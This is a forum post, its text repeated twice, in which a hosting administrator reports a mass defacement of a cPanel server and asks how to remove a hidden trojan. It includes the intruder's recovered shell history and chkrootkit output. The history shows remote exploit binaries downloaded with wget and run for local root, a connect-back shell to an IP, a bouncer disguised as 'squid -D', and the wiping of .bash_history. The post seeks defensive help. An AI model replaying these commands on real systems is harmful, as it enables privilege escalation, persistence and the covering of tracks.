just got hacked
moving to new server and after few hours got hacked
all index.* has been replaced
including all cpanel themes and all clients
so when u logged on http://server/cpanel
http://server/webmail
all you see is the hacker page
http://vipixel.com/hacked.jpg
I can delete the username techteam which uid is 0
but how to remove the hidden Trojan?
says it has hidden pid
uid 0 account (techteam) - BAD!
--> Hidden Pid detected! [pid 10]
--> hidden from ps: [yes]
--> hidden from kernel: [yes]
here's the log i can grab:
i run this:
[~/apps/chkrootkit-0.42b]# ./chkrootkit
Checking `bindshell'... INFECTED (PORTS: 465)
but seem false alarm...
how to clearly remove the trojan file?
please please help.
FYI server updated to latest kernel 2.4.23
but we're still worried about this mass defacement attack.
mind to share tips and tricks security setting for WHM/CPanel?
Thanks in advance,
Brumie
moving to new server and after few hours got hacked
all index.* has been replaced
including all cpanel themes and all clients
so when u logged on http://server/cpanel
http://server/webmail
all you see is the hacker page
http://vipixel.com/hacked.jpg
I can delete the username techteam which uid is 0
but how to remove the hidden Trojan?
says it has hidden pid
uid 0 account (techteam) - BAD!
--> Hidden Pid detected! [pid 10]
--> hidden from ps: [yes]
--> hidden from kernel: [yes]
here's the log i can grab:
Code:
ls
./pt
./kmod
./own
./klogd
./kmod
rm kmod
rm -rf kmod
wget [url]www.viperhaxu.hpg.com.br/ptrace[/url]
chmod ptrace
chmod 777 ptrace
./ptrace
wget [url]www.skater0x.hpg.com.br/local/kmod[/url]
chmod 777 kmod.1
./kmod.1
./newlocal
gcc fedor.c -o fedor
ls
./f
uname -a
chmod 777 f
./f
id
pwd
wget [url]www.skater0x.hpg.com.br/xpll/cancer[/url]
echo SU3D OWNZ > index.txt
chmod 777 cancer
./cancer index.txt
ls
rm bind.txt
ls -la
cat .bash_history
ls
./kmod
./cbd
./cbd 10.28.88.142
cat fedor.c
./f
./ptrace
c
./pt
z
ls
ls
./setuid
id
./ptrace
./own
./ptrace
wget [url]www.creatividade.hpg.com.br/locals[/url]
chmod 777 locals
./locals
./locals
./locals
rm -rf locals
ls
./ptrace
echo lol >.bash_history
ls
./td
id
./pt
id
./td
ls
w
id
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
wget thecoreteam.home.ro/pt
chmod +x pt
./pt
./pt
./pt
./pt
./pt
wget [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
ls
rm -rf *
cd ..
ls
rm -rf *
ls
./newlocal
./localroot
./own
./kmod
rm -rf *
chmod +wrx setuid
id
ls -all
ls
rm -rf sess_fc187590539417321dd72b37686e7e27
cd [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
wget [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
tar zxvf psybnc.tgz
cd psybnc
./psybnc
kill -9 32751
rm -rf psybnc.conf
wget thecoreteam.home.ro/psybnc.conf
mv psybnc "squid -D"
./"squid -D"
exit
id
./km
ls
ls -al km
./km
./km
./km;./km;./km
exit
[~/apps/chkrootkit-0.42b]# ./chkrootkit
Checking `bindshell'... INFECTED (PORTS: 465)
but seem false alarm...
how to clearly remove the trojan file?
please please help.
FYI server updated to latest kernel 2.4.23
but we're still worried about this mass defacement attack.
mind to share tips and tricks security setting for WHM/CPanel?
Thanks in advance,
Brumie